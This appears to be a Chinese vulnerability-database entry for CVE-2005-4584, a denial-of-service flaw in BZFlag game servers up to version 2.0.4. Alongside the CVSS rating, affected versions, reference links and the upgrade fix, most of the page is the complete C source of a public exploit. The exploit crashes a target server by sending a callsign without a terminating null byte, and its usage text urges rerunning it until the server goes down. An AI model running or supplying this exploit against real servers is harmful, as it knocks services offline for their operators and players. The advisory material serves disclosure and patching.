CVE-2005-4584
CVSS5.0
发布时间 :2005-12-29 06:03:00
修订时间 :2008-09-10 15:53:01
NMCOE    

[原文]BZFlag server 2.0.4 and earlier allows remote attackers to cause a denial of service (application crash) via a callsign that is not followed by a NULL (\0) character.


[CNNVD]BZFlag Unterminated Callsign拒绝服务漏洞(CNNVD-200512-622)

        BZFlag server 2.0.4及更早版本使得远程攻击者可以通过一个没有跟随一个空(\0)字符的callsign来发起拒绝服务攻击(应用程序崩溃)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:bzflag:bzflag_server:1.10.6
cpe:/a:bzflag:bzflag_server:1.7d5
cpe:/a:bzflag:bzflag_server:1.7d3
cpe:/a:bzflag:bzflag_server:1.7e4
cpe:/a:bzflag:bzflag_server:2.0.0
cpe:/a:bzflag:bzflag_server:1.7c_release_2
cpe:/a:bzflag:bzflag_server:1.10.2
cpe:/a:bzflag:bzflag_server:1.7d6
cpe:/a:bzflag:bzflag_server:1.7c_release_1
cpe:/a:bzflag:bzflag_server:1.7d8
cpe:/a:bzflag:bzflag_server:2.0.4
cpe:/a:bzflag:bzflag_server:1.7e
cpe:/a:bzflag:bzflag_server:1.7d9
cpe:/a:bzflag:bzflag_server:1.7d7
cpe:/a:bzflag:bzflag_server:1.7c_release_2_patch_1
cpe:/a:bzflag:bzflag_server:1.7g2
cpe:/a:bzflag:bzflag_server:1.10.8
cpe:/a:bzflag:bzflag_server:1.7d4
cpe:/a:bzflag:bzflag_server:1.7d2
cpe:/a:bzflag:bzflag_server:1.7e6
cpe:/a:bzflag:bzflag_server:2.0.2
cpe:/a:bzflag:bzflag_server:1.7d1
cpe:/a:bzflag:bzflag_server:1.10.0
cpe:/a:bzflag:bzflag_server:1.7e1
cpe:/a:bzflag:bzflag_server:1.7c_release_2_patch_3
cpe:/a:bzflag:bzflag_server:1.7g0
cpe:/a:bzflag:bzflag_server:1.10.4
cpe:/a:bzflag:bzflag_server:1.7e2
cpe:/a:bzflag:bzflag_server:1.7c_release_2_patch_2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4584
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4584
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-622
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/16066
(UNKNOWN)  BID  16066
http://securitytracker.com/id?1015418
(UNKNOWN)  SECTRACK  1015418
http://secunia.com/advisories/18238
(VENDOR_ADVISORY)  SECUNIA  18238
http://cvs.sourceforge.net/viewcvs.py/%2Acheckout%2A/bzflag/bzflag/ChangeLog?rev=2.103
(UNKNOWN)  MISC  http://cvs.sourceforge.net/viewcvs.py/*checkout*/bzflag/bzflag/ChangeLog?rev=2.103
http://aluigi.altervista.org/adv/bzflagboom-adv.txt
(VENDOR_ADVISORY)  MISC  http://aluigi.altervista.org/adv/bzflagboom-adv.txt
http://xforce.iss.net/xforce/xfdb/23872
(UNKNOWN)  XF  bzflag-callsign-dos(23872)
http://www.osvdb.org/22036
(UNKNOWN)  OSVDB  22036

- 漏洞信息

BZFlag Unterminated Callsign拒绝服务漏洞
中危 其他
2005-12-29 00:00:00 2006-01-10 00:00:00
远程  
        BZFlag server 2.0.4及更早版本使得远程攻击者可以通过一个没有跟随一个空(\0)字符的callsign来发起拒绝服务攻击(应用程序崩溃)。

- 公告与补丁

        

- 漏洞信息 (1390)

BZFlag <= 2.0.4 (undelimited string) Denial of Service Exploit (EDBID:1390)
multiple dos
2005-12-27 Verified
0 Luigi Auriemma
N/A [点击下载]
/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
/*
   Header file used for manage errors in Windows
   It support socket and errno too
   (this header replace the previous sock_errX.h)
*/

#include <string.h>
#include <errno.h>



void std_err(void) {
    char    *error;

    switch(WSAGetLastError()) {
        case 10004: error = "Interrupted system call"; break;
        case 10009: error = "Bad file number"; break;
        case 10013: error = "Permission denied"; break;
        case 10014: error = "Bad address"; break;
        case 10022: error = "Invalid argument (not bind)"; break;
        case 10024: error = "Too many open files"; break;
        case 10035: error = "Operation would block"; break;
        case 10036: error = "Operation now in progress"; break;
        case 10037: error = "Operation already in progress"; break;
        case 10038: error = "Socket operation on non-socket"; break;
        case 10039: error = "Destination address required"; break;
        case 10040: error = "Message too long"; break;
        case 10041: error = "Protocol wrong type for socket"; break;
        case 10042: error = "Bad protocol option"; break;
        case 10043: error = "Protocol not supported"; break;
        case 10044: error = "Socket type not supported"; break;
        case 10045: error = "Operation not supported on socket"; break;
        case 10046: error = "Protocol family not supported"; break;
        case 10047: error = "Address family not supported by protocol family"; break;
        case 10048: error = "Address already in use"; break;
        case 10049: error = "Can't assign requested address"; break;
        case 10050: error = "Network is down"; break;
        case 10051: error = "Network is unreachable"; break;
        case 10052: error = "Net dropped connection or reset"; break;
        case 10053: error = "Software caused connection abort"; break;
        case 10054: error = "Connection reset by peer"; break;
        case 10055: error = "No buffer space available"; break;
        case 10056: error = "Socket is already connected"; break;
        case 10057: error = "Socket is not connected"; break;
        case 10058: error = "Can't send after socket shutdown"; break;
        case 10059: error = "Too many references, can't splice"; break;
        case 10060: error = "Connection timed out"; break;
        case 10061: error = "Connection refused"; break;
        case 10062: error = "Too many levels of symbolic links"; break;
        case 10063: error = "File name too long"; break;
        case 10064: error = "Host is down"; break;
        case 10065: error = "No Route to Host"; break;
        case 10066: error = "Directory not empty"; break;
        case 10067: error = "Too many processes"; break;
        case 10068: error = "Too many users"; break;
        case 10069: error = "Disc Quota Exceeded"; break;
        case 10070: error = "Stale NFS file handle"; break;
        case 10091: error = "Network SubSystem is unavailable"; break;
        case 10092: error = "WINSOCK DLL Version out of range"; break;
        case 10093: error = "Successful WSASTARTUP not yet performed"; break;
        case 10071: error = "Too many levels of remote in path"; break;
        case 11001: error = "Host not found"; break;
        case 11002: error = "Non-Authoritative Host not found"; break;
        case 11003: error = "Non-Recoverable errors: FORMERR, REFUSED, NOTIMP"; break;
        case 11004: error = "Valid name, no data record of requested type"; break;
        default: error = strerror(errno); break;
    }
    fprintf(stderr, "\nError: %s\n", error);
    exit(1);
}

// combined winerr.h /str0ke

    #define close   closesocket
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>
#endif



#define VER         "0.1"
#define BUFFSZ      0xffff
#define PORT        5154
#define TIMEOUT     8

#define WAITSEC     5
#define CALLSIGNSZ  32
#define MAILSZ      128
#define TOKENSZ     22
#define VERSIONSZ   60
#define TYPE        "\x00\x00"
#define TEAM        "\xff\xfe"  // autoteam



int bzflag_send(int sd, u_char *buff, u_char *code, ...);
int tcp_recv(int sd, u_char *data, int len);
u_short bzflag_recv(int sd, u_char *buff, u_char *code);
int create_rand_string(u_char *data, int len, u_int *seed);
int timeout(int sock, int secs);
u_int resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    u_int   seed;
    int     sd;
    u_short port = PORT,
            len;
    u_char  buff[BUFFSZ],
            callsign[CALLSIGNSZ + 1],
            mail[MAILSZ + 1],
            token[TOKENSZ + 1],
            version[VERSIONSZ + 1],
            code[2];

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif


    setbuf(stdout, NULL);

    fputs("\n"
        "BZFlag <= 2.0.4 (2.x) server crash "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%hu)]\n"
            "\n"
            " This tool works also versus servers protected by password without knowing the\n"
            " keyword!\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);

    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    fputs("- check server version: ", stdout);
    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    if(timeout(sd, TIMEOUT) < 0) {
        printf("\nError: no reply received within %d seconds, this server doesn't seem valid\n\n", TIMEOUT);
        exit(1);
    }
    tcp_recv(sd, buff, 9);

    printf("   %s\n", buff);
    if(memcmp(buff, "BZFS", 4)) {
        fputs("- this server doesn't seem a valid BZFlag server, I try to continue\n", stdout);
    } else {
        if(memcmp(buff + 4, "00", 2)) {
            fputs("- this server uses a version which is not vulnerable, I try to continue\n", stdout);
        }
    }

    if(!timeout(sd, 0)) {   // 2.0.4 sends data while the previous 2.0 not
        len = bzflag_recv(sd, buff, code);
    }

    create_rand_string(callsign, CALLSIGNSZ, &seed);    // <=== THE BUG IS HERE
    create_rand_string(mail,     MAILSZ,     &seed);
    create_rand_string(token,    TOKENSZ,    &seed);
    create_rand_string(version,  VERSIONSZ,  &seed);

    bzflag_send(sd,
        buff,
        "en",
        2,          TYPE,
        2,          TEAM,
        CALLSIGNSZ, callsign,
        MAILSZ,     mail,
        TOKENSZ,    token,
        VERSIONSZ,  version,
        0);

    len = bzflag_recv(sd, buff, code);

    if(memcmp(code, "ac", 2)) {
        buff[len] = 0;
        printf("\n"
            "Error: code \"%.2s\"\n"
            "%s\n"
            "\n",
            code, buff + 2);
    }

    close(sd);

    fputs("- check server:\n", stdout);
    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(
      (connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) ||
      (timeout(sd, 3) < 0)) {
        fputs("\n  Server IS vulnerable!!!\n\n", stdout);
    } else {
        fputs("\n"
            "  Server doesn't seem vulnerable\n"
            "  RELAUNCH THIS TOOL OTHER TIMES UNTIL YOU ARE UNABLE TO CRASH IT!!!\n"
            "\n", stdout);
    }
    close(sd);
    return(0);
}



int bzflag_send(int sd, u_char *buff, u_char *code, ...) {
    va_list ap;
    int     len;
    u_short *blen;
    u_char  *s,
            *p;

    blen = (u_short *)buff;
    memcpy(buff + 2, code, 2);
    p = buff + 4;

    va_start(ap, code);
    while((len = va_arg(ap, int))) {
        s = va_arg(ap, u_char *);
        memcpy(p, s, len);
        p += len;
    }
    va_end(ap);

    *blen = htons(p - (buff + 4));

    len = send(sd, buff, p - buff, 0);
    return(len);
}



int tcp_recv(int sd, u_char *data, int len) {
    int     t;

    while(len) {
        t = recv(sd, data, len, 0);
        if(t <= 0) return(-1);
        data += t;
        len  -= t;
    }

    return(0);
}



u_short bzflag_recv(int sd, u_char *buff, u_char *code) {
    u_short len;

    tcp_recv(sd, (u_char *)&len, 2);
    len = ntohs(len);

    tcp_recv(sd, code, 2);

    tcp_recv(sd, buff, len);

    return(len);
}



int create_rand_string(u_char *data, int len, u_int *seed) {
    u_int   rnd;
    u_char  *p = data;
    const static u_char table[] =
                "0123456789"
                "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                "abcdefghijklmnopqrstuvwxyz";

    rnd = *seed;
//    len = rnd % len;  // max length!
//    if(len < 3) len = 3;

    while(len--) {
        rnd = (rnd * 0x343FD) + 0x269EC3;
        *p++ = table[rnd % (sizeof(table) - 1)];
    }
    *p = 0;

    *seed = rnd;
    return(p - data);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec  = secs;
    tout.tv_usec = 1000;    // in case secs is 0
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u_int resolv(char *host) {
    struct hostent *hp;
    u_int host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif

// milw0rm.com [2005-12-27]
		

- 漏洞信息

22036
BZFlag NULL Byte callsign Handling Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

BZFlag contains a flaw that may allow a remote denial of service. The issue is triggered when the BZFlag server process is sent a callsign message which is not NULL-terminated, and will result in loss of availability of the service.

- 时间线

2005-12-25 Unknow
2005-12-25 Unknow

- 解决方案

Upgrade to the latest version available from CVS from end of October 2005 or later, as it has been reported to fix this vulnerability. Note that this flaw was fixed in the CVS tree without a change in version number. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站